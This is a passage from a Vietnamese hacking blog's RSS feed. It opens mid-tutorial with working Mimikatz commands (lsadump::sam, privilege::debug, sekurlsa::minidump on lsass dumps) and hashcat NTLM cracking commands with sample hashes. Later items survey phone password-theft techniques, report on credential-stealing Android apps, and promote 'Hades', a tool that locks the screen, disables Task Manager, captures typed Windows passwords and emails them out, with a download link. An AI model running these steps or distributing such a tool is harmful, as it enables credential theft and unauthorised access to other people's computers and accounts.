<p>Và mình sẽ thực hiện lệnh chỉ ra các tệp mà các tổ hợp registry được lưu vào đó, đó là <strong>SystemBkup.hiv</strong> và <strong>SamBkup.hiv</strong>:</p>
<p><code>lsadump::sam /system:SystemBkup.hiv /sam:SamBkup.hiv</code></p>
<p><strong>Kết quả:</strong></p>
<div>
<div>
<div><img decoding="async" class="size-full  aligncenter" src="https://anonyviet.com/wp-content/uploads/2020/12/52.png" alt="Hack Password Windows bằng cách xuất dữ liệu từ RAM với Mimikatz 35" width="537" height="688" title="Hack Password Windows bằng cách xuất dữ liệu từ RAM với Mimikatz 45"></div>
<div></div>
<div>
<p>Chỉ một người dùng có hàm băm được tìm thấy ở đây:</p>
<p><code>User: Администратор</code></p>
<p><code>Hash NTLM: 5187b179ba87f3ad85fea3ed718e961f</code></p>
<p>Trên thực tế, để trích xuất các hàm băm NTLM từ hệ thống cục bộ, không cần thiết phải kết xuất tổ chức registry. Một tùy chọn khác là tăng các đặc quyền của chính chương trình mimikatz và trích xuất hàm băm trực tiếp từ hệ thống. Để thực hiện việc này, hãy chạy các lệnh:</p>
<p><code>privilege::debug</code><br />
<code>token::elevate</code><br />
<code>log hash-local2.txt</code><br />
<code>lsadump::sam</code></p>
<p>&nbsp;</p>
<div>
<div><img decoding="async" class="size-full  aligncenter" src="https://anonyviet.com/wp-content/uploads/2020/12/53.png" alt="Hack Password Windows bằng cách xuất dữ liệu từ RAM với Mimikatz 36" width="866" height="688" title="Hack Password Windows bằng cách xuất dữ liệu từ RAM với Mimikatz 46"></div>
<h2>Cách giải nén hàm băm NTLM từ tệp lsass.DMP</h2>
<p>Về mặt logic trong kết xuất của Local Security Authority Process chỉ nên là hàm băm của người dùng đã đăng nhập bằng mật khẩu.</p>
<p>Đầu tiên, chỉ định đường dẫn đến tệp kết xuất bằng lệnh:</p>
<p><span style="font-size: 14pt;"><code>sekurlsa::minidump C:\path\to\lsass.DMP</code></span></p>
<p>Ví dụ:</p>
<p><span style="font-size: 14pt;"><code>sekurlsa::minidump C:\Share-Server\files\lsass.DMP</code></span></p>
<p>Sau đó chạy lệnh:</p>
<p><span style="font-size: 14pt;"><code>sekurlsa::logonPasswords</code></span></p>
<h2>Cách Hack Password Windows bằng brute-force NTLM</h2>
</div>
</div>
</div>
<div>
<p>Để thực hiện, mình sẽ sử dụng hàm băm sau:</p>
<ul>
<li><code>User : Alexey</code></li>
<li><code>Hash NTLM: ca76a176340f0291e1cc8ea7277fc571</code></li>
</ul>
<p>Hãy xem phần trợ giúp của <a href="https://miloserdov.org/?goto=7" target="_blank" rel="noopener">Hashcat</a> để tìm ra số chế độ băm NTLM:</p>
<p><code>1000 | NTLM                                             | Operating Systems</code></p>
<p>Số băm NTLM là 1000 (chế độ băm).</p>
<p>Để khởi chạy một cuộc tấn công để bẻ khóa NTLM trong Hashcat, bạn cần chạy một lệnh có dạng:</p>
<p><code>hashcat -m 1000 -a 3 'HASH'MASK</code></p>
<p>Ví dụ:</p>
<p><code>hashcat --force --hwmon-temp-abort=100 -m 1000 -D 1,2 -a 3 -i --increment-min 1 --increment-max 10 -1 ?l?d ca76a176340f0291e1cc8ea7277fc571 ?1?1?1?1?1?1?1?1?1</code></p>
<p><a href="https://anonyviet.com/wp-content/uploads/2020/12/54.png"><img decoding="async" class="aligncenter size-full " src="https://anonyviet.com/wp-content/uploads/2020/12/54.png" alt="Hack Password Windows bằng cách xuất dữ liệu từ RAM với Mimikatz 37" width="583" height="345" title="Hack Password Windows bằng cách xuất dữ liệu từ RAM với Mimikatz 47"></a></p>
<p>Giải thích lệnh:</p>
<ul>
<li><strong>hashcat</strong> là tên của tệp thực thi. Trên Windows, nó có thể <strong>hashcat64.exe</strong>.</li>
<li><strong>&#8211;force</strong> có nghĩa là bỏ qua các cảnh báo</li>
<li><strong>&#8211;hwmon-temp-abort=100</strong> có nghĩa là thiết lập nhiệt độ tối đa, sau đó quá trình brute-force sẽ bị gián đoạn, khi nhiệt độ máy chạm mức 100 độ C</li>
<li><strong>-m 1000 </strong>nghĩa là kiểu băm NTLM</li>
<li><strong>-D 1,2</strong> có nghĩa là sử dụng cả cpu và gpu cho brute-force</li>
<li><strong>-a 3</strong> nghĩa là mask attack</li>
<li><strong>-i</strong> có nghĩa là tăng dần số lượng ký tự trong mật khẩu đã tạo</li>
<li><strong>&#8211;increment-min 1</strong> có nghĩa là bắt đầu với chiều dài mask bằng một</li>
<li><strong>&#8211;increment-max 10</strong> nghĩa là kết thúc tìm kiếm với độ dài mask là mười</li>
<li><strong>-1 ?l?d</strong> có nghĩa là bộ ký tự tùy chỉnh số 1, nó bao gồm các chữ cái Latinh nhỏ (?l) và số (?d)</li>
<li><strong>ca76a176340f0291e1cc8ea7277fc571</strong> là mã băm để hack</li>
<li><strong>?1?1?1?1?1?1?1?1?1</strong> là một mask từ một bộ ký tự tùy chỉnh</li>
</ul>
<p>Hãy giải mã thêm một hàm băm nữa:</p>
<p><code>User : Администратор</code></p>
<p><code>Hash NTLM: 5187b179ba87f3ad85fea3ed718e961f</code></p>
<p>Bạn cũng dùng lệnh dưới đây:</p>
<p><code>hashcat --force --hwmon-temp-abort=100 -m 1000 -D 1,2 -a 3 -i --increment-min 1 --increment-max 10 -1 ?l?u?d 5187b179ba87f3ad85fea3ed718e961f ?1?1?1?1?1?1?1?1?1</code></p>
<p><a href="https://anonyviet.com/wp-content/uploads/2020/12/55.png"><img decoding="async" class="aligncenter size-full " src="https://anonyviet.com/wp-content/uploads/2020/12/55.png" alt="Hack Password Windows bằng cách xuất dữ liệu từ RAM với Mimikatz 38" width="572" height="391" title="Hack Password Windows bằng cách xuất dữ liệu từ RAM với Mimikatz 48"></a></p>
<p>Vậy là xong rồi đó.</p>
<p>&nbsp;</p>
</div>
</div>
<h2>Câu hỏi thường gặp</h2>
<h3>Mimikatz là gì và nó hoạt động như thế nào?</h3>
<p>Mimikatz là một công cụ mạnh mẽ có khả năng trích xuất mật khẩu, mã băm, và các thông tin xác thực khác từ bộ nhớ RAM của hệ thống Windows. Nó hoạt động bằng cách truy cập vào quá trình lsass.exe, nơi lưu trữ các thông tin nhạy cảm này.</p>
<h3>Tôi có thể lấy mật khẩu Windows từ một máy tính đã tắt không?</h3>
<p>Có, bạn có thể lấy được mã băm mật khẩu từ các tập tin SAM và SYSTEM trong thư mục C:\Windows\System32\config\.  Tuy nhiên, bạn cần truy cập vật lý vào máy tính hoặc sử dụng một bản sao lưu hệ thống.</p>
<h3>Sự khác biệt giữa các loại mã băm NTLM là gì?</h3>
<p>NTLM, NTLMv1/v2 và Net-NTLMv1/v2 là các loại mã băm khác nhau được sử dụng trong Windows.  NTLM được sử dụng cục bộ, trong khi NTLMv1/v2 và Net-NTLMv1/v2 được dùng cho xác thực mạng.  Pass-the-hash thường sử dụng mã băm NTLM.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://anonyviet.com/hack-password-windows-bang-mimikatz/feed/</wfw:commentRss>
			<slash:comments>1</slash:comments>
		
		
			</item>
		<item>
		<title>7 cách Hacker sử dụng để hack Password điện thoại của bạn</title>
		<link>https://anonyviet.com/cach-hacker-su-dung-de-hack-password-dien-thoai/</link>
					<comments>https://anonyviet.com/cach-hacker-su-dung-de-hack-password-dien-thoai/#respond</comments>
		
		<dc:creator><![CDATA[Ellyx13]]></dc:creator>
		<pubDate>Mon, 26 Oct 2020 08:47:40 +0000</pubDate>
				<category><![CDATA[Basic Hacking]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[hack mật khẩu điện thoại]]></category>
		<category><![CDATA[hack password]]></category>
		<category><![CDATA[hack password điện thoại]]></category>
		<category><![CDATA[hacker]]></category>
		<category><![CDATA[tấn công mạng]]></category>
		<guid isPermaLink="false">https://anonyviet.com/?p=22889</guid>

					<description><![CDATA[Mặc dù bạn dùng Password 6 chữ số, văn bản hoặc hình ảnh, nhưng điện thoại hoặc máy tính của bạn vẫn có thể dễ dàng bị tấn công. Vậy nên trong bài viết này, mình sẽ giới thiệu cho bạn 7 cách phổ biến nhất mà Hacker hack Password điện thoại của bạn. Ngoài [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><strong>Mặc dù bạn dùng Password 6 chữ số, văn bản hoặc hình ảnh, nhưng điện thoại hoặc máy tính của bạn vẫn có thể dễ dàng bị tấn công. Vậy nên trong bài viết này, mình sẽ giới thiệu cho bạn 7 cách phổ biến nhất mà Hacker hack Password điện thoại của bạn. Ngoài <a href="https://anonyviet.com/top-20-cong-cu-hack-duoc-hacker-su-dung/" target="_blank" rel="noopener noreferrer">Top 20 công cụ Hack được Hacker và Chuyên gia bảo mật sử dụng,</a> họ còn dùng các thủ thuật khác để tấn công mật khẩu của bạn.</strong></p>
<p><img decoding="async" class="aligncenter  size-full" src="https://anonyviet.com/wp-content/uploads/2020/10/55.jpeg" alt="hack Password điện thoại" title="7 cách Hacker sử dụng để hack Password điện thoại của bạn 53"></p>
<h2>Hack Password bằng hình ảnh nhiệt</h2>
<p>Sau khi nhập Password, bạn phải cất điện thoại của mình ngay nếu không muốn điện thoại của mình bị hack. Theo các nhà khoa học từ Đại học Stuttgart và các đồng nghiệp của họ từ Đại học Ludwig Maximilian của Munich, sẽ giải thích cho chúng ta biết tại sao phải làm như vậy. Với sự trợ giúp của hình ảnh nhiệt, các nhà nghiên cứu đã xác định được 90% Password gồm 4 chữ số được nhập trên màn hình. Nhiệt độ từ tay sẽ được giữ lại trên chỗ chúng ta nhập Password, thậm chí nó tồn tại gần 1 phút sau khi bạn nhập mật mã.</p>
<p><img decoding="async" class="size-full  aligncenter" src="https://anonyviet.com/wp-content/uploads/2020/10/56.jpeg" alt="7 cách Hacker sử dụng để hack Password điện thoại của bạn 40" title="7 cách Hacker sử dụng để hack Password điện thoại của bạn 54">Một hacker có thể giấu máy ảnh trong tay và chụp màn hình chụp Password từ phía sau của bạn mà bạn không hề hay biết. Các nhà nghiên cứu khuyến nghị người dùng nên vuốt nhiều lần vào màn hình bằng tay để làm loạn nhiệt độ trên thiết bị. Bạn cũng có thể tăng độ sáng màn hình hoặc làm nóng máy để tránh bị hack.</p>
<h2>Nhận dạng Password bằng vân tay</h2>
<p>Máy ảnh có độ phân giải cao có thể dễ dàng chụp lại dấu vân tay của bạn trên màn hình. <a href="https://static.usenix.org/events/woot10/tech/full_papers/Aviv.pdf?ref=hackernoon.com" target="_blank" rel="noopener">Phương pháp này</a> được các nhà khoa học tại Đại học Pennsylvania nghiên cứu và mô tả từ năm 2010. Ngày nay, dấu vân tay cũng có thể được ghi lại bằng máy ảnh nghiệp dư hay một chiếc điện thoại thông minh loại tốt. Khá dễ để giả vờ bạn đang chụp ảnh bữa tối của mình trong khi sự thật là bạn đang chụp màn hình điện thoại của người khác.</p>
<h2>Password Android là dễ bị hack nhất</h2>
<p><img decoding="async" class="aligncenter  size-full" src="https://anonyviet.com/wp-content/uploads/2020/10/57.jpeg" alt="Password Android là thứ dễ bị hack nhất" width="576" height="334" title="7 cách Hacker sử dụng để hack Password điện thoại của bạn 55"></p>
<p>Các nhà nghiên cứu cho biết: “Password hình càng phức tạp thì càng dễ xác định. Chỉ cần ngồi gần nạn nhân khoảng 5 mét và quay video về quá trình mở khóa là đủ. Hơn nữa, video này sẽ được upload cho một ứng dụng đặc biệt dùng để phân tích chuyển động của ngón tay và cung cấp tối đa 5 biến thể của Password. Kết quả là 95% một trong các Password được cung cấp sẽ hoạt động.</p>
<h2>Password có thể bị rò rỉ thông qua mạng Wi-Fi</h2>
<p>Adrian Colyer, một cựu CTO của SpringSource, đã tiết lộ cách hack mã PIN với sự trợ giúp từ việc phân tích tín hiệu Wi-Fi. Công nghệ này được gọi là WindTalker. Colyer đã chứng minh rằng các chuyển động của ngón tay trên màn hình ảnh hưởng đến tín hiệu Wi-Fi. Nếu Hacker thiết lập một điểm phát sóng, họ sẽ có thể theo dõi sự thay đổi này.</p>
<p>Trong thử nghiệm của Colyer, các nhà nghiên cứu đã hack được tài khoản Alipay, một trong những nền tảng thanh toán an toàn và tốt nhất trên thế giới. Ứng dụng cung cấp cho họ 3 Password và một trong số đó đã khớp với Password thật. Phương pháp này chính xác đến 68%. Bạn càng có nhiều dữ liệu, thì tỷ lệ phân tích càng chính xác.</p>
<h2>Chuyển động của ngón tay trên đồng hồ thông minh khiến Password dễ bị lộ</h2>
<p><a href="https://anonyviet.com/wp-content/uploads/2020/10/hack-password-dien-thoai.jpeg"><img decoding="async" class="aligncenter size-full " src="https://anonyviet.com/wp-content/uploads/2020/10/hack-password-dien-thoai.jpeg" alt="hack mật khẩu điện thoại" width="353" height="235" title="7 cách Hacker sử dụng để hack Password điện thoại của bạn 56"></a></p>
<p>Nếu Hacker đặt một máy quét đặc biệt gần nơi làm việc của bạn, họ cũng có thể lấy Password hoặc mã PIN của bạn bằng cách theo dõi chuyển động tay của bạn trên đồng hồ thông minh hoặc thiết bị theo dõi thể dục.</p>
<p>Thí nghiệm này được thực hiện tại Viện Công nghệ Stevens và Đại học Bang New York tại Binghamton. Các nhà nghiên cứu đã tạo ra một máy quét theo dõi phổ điện từ, từ các cảm biến của đồng hồ thông minh. Dữ liệu từ máy quét được truyền qua Bluetooth.</p>
<p>Kết quả quét được xử lý trong ứng dụng và xác định tới hơn 5 nghìn chuyển động chính. Để tạo thuật toán, hơn 20 người dùng đã tham gia dự án này, 2 mẫu điện thoại thông minh và một thiết bị theo dõi thể dục được sử dụng.</p>
<p>80% Password của nạn nhân được phát hiện trong lần thử đầu tiên. Nếu người dùng nhập hai lần cùng một tổ hợp, thì có 90% khả năng phát hiện được Password. Thiết bị càng có nhiều cảm biến (con quay hồi chuyển, từ kế, gia tốc kế) thì kết quả càng chính xác.</p>
<h2>Password có thể bị hack từ ảnh chụp màn hình</h2>
<p>PC của bạn có thể chụp ảnh màn hình bất kỳ lúc nào, ngay cả khi bạn đang nhập Password. Sư cố này được phát hiện bởi Felix Krause, người sáng lập Fastlane Tools, vào cuối năm 2017. Ảnh chụp màn hình được chụp bởi tính năng <a href="https://developer.apple.com/documentation/coregraphics/1454852-cgwindowlistcreateimage?language=objc&amp;ref=hackernoon.com" target="_blank" rel="noopener">CGWindowListCreateImage</a> mà không cần sự cho phép của người dùng. Phần mềm độc hại có thể chụp ảnh màn hình, chạy nền và có quyền truy cập vào từng pixel của ảnh như vậy hacker dễ dàng hack Password điện thoại của bạn</p>
<h2>Cài đặt Keylogger trên thiết bị của bạn</h2>
<p>Cài đặt keylogger hoặc ứng dụng gián điệp là một trong những cách phổ biến nhất để làm hack Password điện thoại hoặc máy tính của người dùng. Ưu điểm của phương pháp này là tính khả dụng của nó (có rất nhiều keylogger trên thị trường hiện nay) và cách sử dụng nó cũng rất đơn giản. Keylogger phù hợp với cả những người không hiểu biết về công nghệ vì quá trình cài đặt mất không tới 5 phút và phần mềm gián điệp cho phép xem dữ liệu trong một vài cú nhấp chuột.</p>
<p>Một ứng dụng gián điệp được cài đặt trên mục tiêu, được định cấu hình và ẩn khỏi người dùng giúp hacker dễ dàng hack Password điện thoại. Sau khi được cài đặt, keylogger bắt đầu thu thập tất cả dữ liệu từ thiết bị, bao gồm Password, thông tin đăng nhập, các cuộc trò chuyện trên mạng xã hội,,,. Tất cả dữ liệu được gửi đến tài khoản trực tuyến của Hacker, nơi chúng có thể xem dữ liệu của mục tiêu, trong khi mục tiêu không nghi ngờ rằng mình đang bị theo dõi.</p>
<p>Điều thú vị là các ứng dụng như vậy hiện đang được sử dụng rộng rãi cho các mục đích pháp lý như kiểm soát của phụ huynh và giám sát nhân viên. Các ứng dụng kiểm soát của cha mẹ như <strong>EvaSpy hay <a href="https://anonyviet.com/cach-su-dung-norton-family-de-quan-ly-tre-em-dung-may-tinh-dien-thoai/" target="_blank" rel="noopener noreferrer">Norton Family</a></strong> thường có thiết kế thân thiện với gia đình và cho phép cha mẹ kiểm tra bất kỳ hoạt động nào của con họ.</p>
<h2>MITM-Attacks</h2>
<p>Còn được gọi là tấn công <strong>man-in-the-middle,</strong> phương pháp hack này rất hoàn hảo để lấy được Password của người dùng. Thông thường, các trình đánh giá như <strong>Intercepter-NG</strong> được sử dụng cùng với các cuộc tấn công MITM để lấy Password và cookie của người dùng.</p>
<p>Dữ liệu được thu thập có thể dùng để đăng nhập vào tài khoản của người dùng, xem các file đã tải xuống,&#8230; Bên cạnh đó, ứng dụng này cũng có thể xóa cookie của người dùng và khiến họ nhập lại thông tin đăng nhập. Trong quá khứ, công cụ này thậm chí còn chụp được Password iCloud nhưng các nhà phát triển của Apple đã nhanh chóng sửa lỗi này.</p>
<h2>Câu hỏi thường gặp</h2>
<h3>Làm thế nào hacker có thể lấy mật khẩu của tôi chỉ từ hình ảnh nhiệt?</h3>
<p>Hacker có thể sử dụng hình ảnh nhiệt để phát hiện dấu vết nhiệt còn lại trên màn hình sau khi bạn nhập mật khẩu.  Dấu vết này có thể cho phép họ đoán được mật khẩu của bạn.</p>
<h3>Liệu dấu vân tay của tôi trên màn hình có thể bị sử dụng để hack mật khẩu?</h3>
<p>Có, máy ảnh độ phân giải cao có thể chụp lại dấu vân tay của bạn trên màn hình và sử dụng chúng để mở khóa điện thoại.  Điều này đặc biệt nguy hiểm nếu bạn thường xuyên sử dụng cùng một mẫu khi nhập mật khẩu.</p>
<h3>Tôi có thể làm gì để bảo vệ mật khẩu của mình khỏi các cuộc tấn công qua Wi-Fi?</h3>
<p>Các cuộc tấn công Man-in-the-Middle (MITM) có thể theo dõi hoạt động nhập liệu của bạn trên Wi-Fi.  Hãy đảm bảo chỉ kết nối với các mạng Wi-Fi đáng tin cậy và sử dụng VPN để mã hóa kết nối của bạn.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://anonyviet.com/cach-hacker-su-dung-de-hack-password-dien-thoai/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Password Facebook bị đánh cắp bởi 25 ứng dụng Android độc hại: bạn cần phải làm gì?</title>
		<link>https://anonyviet.com/password-facebook-bi-danh-cap-boi-25-ung-dung-android-doc-hai/</link>
					<comments>https://anonyviet.com/password-facebook-bi-danh-cap-boi-25-ung-dung-android-doc-hai/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Wed, 01 Jul 2020 03:33:01 +0000</pubDate>
				<category><![CDATA[Tin tức]]></category>
		<category><![CDATA[android]]></category>
		<category><![CDATA[App]]></category>
		<category><![CDATA[app android]]></category>
		<category><![CDATA[Facebook]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[hack android]]></category>
		<category><![CDATA[hack password]]></category>
		<category><![CDATA[ứng dụng Android]]></category>
		<category><![CDATA[ứng dụng độc hại]]></category>
		<guid isPermaLink="false">https://anonyviet.com/?p=20421</guid>

					<description><![CDATA[25 ứng dụng Android độc hại được thiết kế bí mật để đánh cắp thông tin đăng nhập tài khoản Facebook đã bị xóa khỏi Cửa hàng Google Play. Theo công ty bảo mật thông tin Pháp Evina, các ứng dụng đã đạt được hơn 2,34 triệu lượt tải xuống trước khi chúng bị xóa [&#8230;]]]></description>
										<content:encoded><![CDATA[<p>25 ứng dụng Android độc hại được thiết kế bí mật để đánh cắp thông tin đăng nhập tài khoản Facebook đã bị xóa khỏi Cửa hàng Google Play.</p>
<p>Theo công ty bảo mật thông tin Pháp Evina, các ứng dụng đã đạt được hơn 2,34 triệu lượt tải xuống trước khi chúng bị xóa khỏi Play Store vào đầu tháng 6.</p>
<p>Trong một bài đăng trên blog, các nhà nghiên cứu của Evina đã viết: Phần mềm độc hại này có thể hủy hoại cuộc sống online lẫn ngoài đời thật của bạn bằng cách tiết lộ thông tin nhạy cảm về cuộc sống riêng tư của bạn như tài sản ảo, các cuộc nói chuyện với Tuesday&#8230;.</p>
<p>Các ứng dụng cũng phá hoại người dùng bằng cách mở các tab trình duyệt web mới để hiện các quảng cáo không mong muốn, có rất nhiều bình luận có vẻ rất tực giận của người dùng trên trang đánh giá của Google. Không rõ có bao nhiêu người dùng đã bị đánh cắp thông tin Facebook của họ.</p>
<p><a href="https://anonyviet.com/wp-content/uploads/2020/07/google-xoa-25-ung-dung-doc-hai-hack-pass-fb-1-1.jpg"><img decoding="async" class="aligncenter  size-full" src="https://anonyviet.com/wp-content/uploads/2020/07/google-xoa-25-ung-dung-doc-hai-hack-pass-fb-1-1.jpg" alt="25 ứng dụng độc hại hack pass facebook" width="551" height="308" title="Password Facebook bị đánh cắp bởi 25 ứng dụng Android độc hại: bạn cần phải làm gì? 59"></a></p>
<h2>Đánh lừa người dùng</h2>
<p>Để lừa người dùng tải xuống, 25 ứng dụng Android độc hại đã giả mạo như trò chơi, đèn flash, hình nền, phần mềm chỉnh sửa hình ảnh và video, máy quét mã QR, bộ đếm bước chân và trình quản lý file.</p>
<p>Trong khi các ứng dụng thực hiện các chức năng này, các nhà nghiên cứu cho biết các ứng dụng cũng có thể kiểm tra xem ứng dụng Facebook có đang chạy nền không.</p>
<p>Nếu có, các ứng dụng sau đó sẽ cố gắng đánh lừa người dùng nhập thông tin đăng nhập Facebook của họ vào trang đăng nhập Facebook giả mạo.</p>
<p>&#8220;Khi một ứng dụng được khởi chạy trên điện thoại của bạn, phần mềm độc hại truy vấn tên ứng dụng&#8221;, bài đăng trên blog của Evina cho biết: &#8220;Nếu đó là một ứng dụng của Facebook, phần mềm độc hại sẽ khởi chạy một trình duyệt Facebook cùng một lúc.&#8221;</p>
<p>Trình duyệt được hiển thị ở nền trước khiến bạn nghĩ rằng ứng dụng đã khởi chạy nó.</p>
<h2>Cách phòng tránh các ứng dụng Android độc hại</h2>
<p>Bằng cách thực hiện các hành động đã nêu ở trên, người dùng đã gửi thông tin đăng nhập Facebook của họ trực tiếp đến Hacker một cách hiệu quả.</p>
<p>Các nhà nghiên cứu giải thích: Khi bạn nhập thông tin đăng nhập vào trình duyệt này, ứng dụng Android độc hại sẽ thực thi JavaScript để truy xuất chúng. Phần mềm độc hại sẽ gửi thông tin tài khoản của bạn đến một máy chủ.</p>
<p>Evina đã phát hiện ra các ứng dụng độc hại vào tháng 5 và sau đó đã báo cáo chúng cho Google. Sau khi xem xét các phát hiện, Google đã tiếp tục xóa chúng vào đầu tháng 6. Đây là danh sách 25 ứng dụng độc hại vừa bị xóa bởi Google:</p>
<p><a href="https://anonyviet.com/wp-content/uploads/2020/07/danh-sach-25-ung-dung-doc-hai-1-1.jpg"><img decoding="async" class="aligncenter  size-full" src="https://anonyviet.com/wp-content/uploads/2020/07/danh-sach-25-ung-dung-doc-hai-1-1.jpg" alt="Danh sách 25 ứng dụng độc hại bị xóa bởi Google" width="462" height="589" title="Password Facebook bị đánh cắp bởi 25 ứng dụng Android độc hại: bạn cần phải làm gì? 60"></a></p>
<p>Download các ứng dụng không xác định hoặc được đánh giá sao thấp trên Play Store có thể gây nguy hiểm, &#8220;Jake Moore, chuyên gia bảo mật tại ESET đã nói.</p>
<p>&#8220;Những ứng dụng này có thể gây hư hỏng cho thiết bị hoặc thậm chí đánh cắp thông tin đăng nhập như mật khẩu và mật khẩu một lần (one time). Bạn nghiên cứu đầy đủ các thông tin của ứng dụng (tác giả, lượt tải, lượt bình luận, đánh giá) trước khi quyết định cài đặt vào điện thoại.&#8221;</p>
<p>Ông nói thêm: Phần mềm Malware có thể ẩn nấp trên các cửa hàng ứng dụng hợp pháp nhưng chúng dễ phân biệt các ứng dụng chính hãng hơn vì số lượng tải xuống thường sẽ thấp. Lời khuyên của tôi sẽ là nên chọn các ứng dụng nổi tiếng với các đánh giá tốt và các cửa hàng ứng dụng đáng tin cậy.</p>
<p>Ngoài ra, để bảo vệ tài khoản mạng xã hội của bạn và các tài khoản khác khỏi bị hack, hãy đảm bảo bạn bật <strong>xác thực hai yếu tố</strong> trong trường hợp chi tiết của bạn bị tấn công.</p>
<p>Vì vậy, bạn cũng nên cài thêm các ứng dụng diệt virus cho Android để bảo vệ điện thoại của bạn khỏi các ứng dụng độc hại như: Bitdefender Mobile Security, Norton Mobile Security, Avast Mobile Security, <a href="https://anonyviet.com/share-key-kaspersky-mobile-antivirus-moi-nhat/">Kaspersky Internet Security for Android</a>&#8230; để quét bảo mật trước khi ứng dụng được cài vào điện thoại.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://anonyviet.com/password-facebook-bi-danh-cap-boi-25-ung-dung-android-doc-hai/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Share Tool Hades dùng để Troll và Phishing Password Windows</title>
		<link>https://anonyviet.com/share-tool-hades-dung-de-troll-va-phishing-password-windows/</link>
					<comments>https://anonyviet.com/share-tool-hades-dung-de-troll-va-phishing-password-windows/#comments</comments>
		
		<dc:creator><![CDATA[Ellyx13]]></dc:creator>
		<pubDate>Fri, 01 May 2020 14:16:51 +0000</pubDate>
				<category><![CDATA[Basic Hacking]]></category>
		<category><![CDATA[hack password]]></category>
		<category><![CDATA[Hades]]></category>
		<category><![CDATA[password]]></category>
		<category><![CDATA[phishing]]></category>
		<category><![CDATA[troll]]></category>
		<guid isPermaLink="false">https://anonyviet.com/?p=19477</guid>

					<description><![CDATA[Mình vừa tạo ra một tool troll và phishing mới đặt tên là Hades. Tool này được viết bằng C# Winform. Dựa trên nền .Net framework 4.7.2. Hades chỉ mới trong giai đoạn beta nên vẫn còn phát triển về sau, các bạn khỏi lo. À mà với điều kiện, event đông các bạn tham [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><strong>Mình vừa tạo ra một tool troll và phishing mới đặt tên là Hades. Tool này được viết bằng C# Winform. Dựa trên nền .Net framework 4.7.2. Hades chỉ mới trong giai đoạn beta nên vẫn còn phát triển về sau, các bạn khỏi lo. À mà với điều kiện, event đông các bạn tham gia. Hades mình chỉ viết vu vơ thôi nhưng admin gợi ý làm hẳn tool rồi đăng cho anh em xài nên mình triển luôn, ngại gì. Cũng coi như là quà cho các bạn member Anonyviet.</strong></p>
<p><a href="https://anonyviet.com/wp-content/uploads/2020/05/hades-tool-troll-hack-pass.jpg"><img decoding="async" class="aligncenter size-full " src="https://anonyviet.com/wp-content/uploads/2020/05/hades-tool-troll-hack-pass.jpg" alt="hades tool troll hack pass" title="Share Tool Hades dùng để Troll và Phishing Password Windows 62"></a></p>
<h2>Tính năng Tool Hades</h2>
<ul>
<li>Tự mở tool khi người dùng đăng nhập vào Windows</li>
<li>Bât full màn hình</li>
<li>Vô hiệu hoá TaskManager</li>
<li>Không tắt được trừ khi nhập đúng pass hoặc shutdown máy</li>
<li>Tạo ra file password chứa mật khẩu người dùng đã nhập</li>
<li>Tự gửi file pass đó về gmail đã được thiết lập (phiên bản đặc biệt)</li>
</ul>
<p>Mình sẽ phát triển thêm các tính năng khác nếu các bản ủng hộ tool</p>
<h2>Video Demo</h2>
<div class="jeg_video_container jeg_video_content"><iframe loading="lazy" title="Hades - Tool troll bạn bè của Anonyviet" width="500" height="281" src="https://www.youtube.com/embed/kp0Lw_jq7w0?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe></div>
<p>Vừa nãy trong phần tính năng các bạn có nghe đến phiên bản đặc biệt trong tính năng gửi mail đúng không? Là như này, Anonyviet sẽ tạo ra 2 phiên bản. Phiên bản bình thường sẽ bao gồm các tính năng trên và không có tính năng gửi mail. Còn phiên bản đặc biệt thì có đầy đủ tính năng.</p>
<p>Vậy, làm sao để có phiên bản đặc biệt? Đơn giản lám, chỉ cần vào fanpage của <a href="https://www.facebook.com/anonyvietdotcom/" target="_blank" rel="noopener">Anonyviet</a>, sẽ có 1 bài event về tool này, làm đúng theo hướng dẫn và đợi kết quả xổ số thôi.</p>
<p>Cập nhật: Event đã hết nên các bạn <a href="https://github.com/JunPham/Hades" target="_blank" rel="noopener">download tại github</a> nhé.</p>
<p>Các bạn xem thêm cách lấy password window bằng PowerMemory <a href="https://anonyviet.com/cach-su-dung-powermemory-de-hack-password-login-windows/">tại đây</a>.</p>
<h2>Câu hỏi thường gặp</h2>
<h3>Hades là gì?</h3>
<p>Hades là một công cụ troll và phishing mật khẩu Windows được viết bằng C# Winform.  Hiện tại đang ở phiên bản Beta và có thể tự động mở khi người dùng đăng nhập vào Windows, vô hiệu hóa Task Manager, và ghi lại mật khẩu người dùng.</p>
<h3>Tôi có thể tải Hades ở đâu?</h3>
<p>Hiện tại, bạn có thể tải Hades từ GitHub tại địa chỉ: <a href="https://github.com/JunPham/Hades" target="_blank" rel="noopener">https://github.com/JunPham/Hades</a></p>
<h3>Có phiên bản đặc biệt của Hades không?</h3>
<p>Có. Phiên bản đặc biệt bao gồm tính năng gửi mật khẩu đã thu thập được qua email.  Tuy nhiên, event để nhận phiên bản này đã kết thúc.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://anonyviet.com/share-tool-hades-dung-de-troll-va-phishing-password-windows/feed/</wfw:commentRss>
			<slash:comments>8</slash:comments>
		
		
			</item>
		<item>
		<title>Cách sử dụng PowerMemory để Hack Password Login Windows bằng truy xuất RAM</title>
		<link>https://anonyviet.com/cach-su-dung-powermemory-de-hack-password-login-windows/</link>
					<comments>https://anonyviet.com/cach-su-dung-powermemory-de-hack-password-login-windows/#respond</comments>
		
		<dc:creator><![CDATA[Ellyx13]]></dc:creator>
		<pubDate>Fri, 01 May 2020 06:57:47 +0000</pubDate>
				<category><![CDATA[Basic Hacking]]></category>
		<category><![CDATA[hack password]]></category>
		<category><![CDATA[hack windows]]></category>
		<category><![CDATA[password]]></category>
		<category><![CDATA[plain text]]></category>
		<category><![CDATA[PowerMemory]]></category>
		<guid isPermaLink="false">https://anonyviet.com/?p=19454</guid>

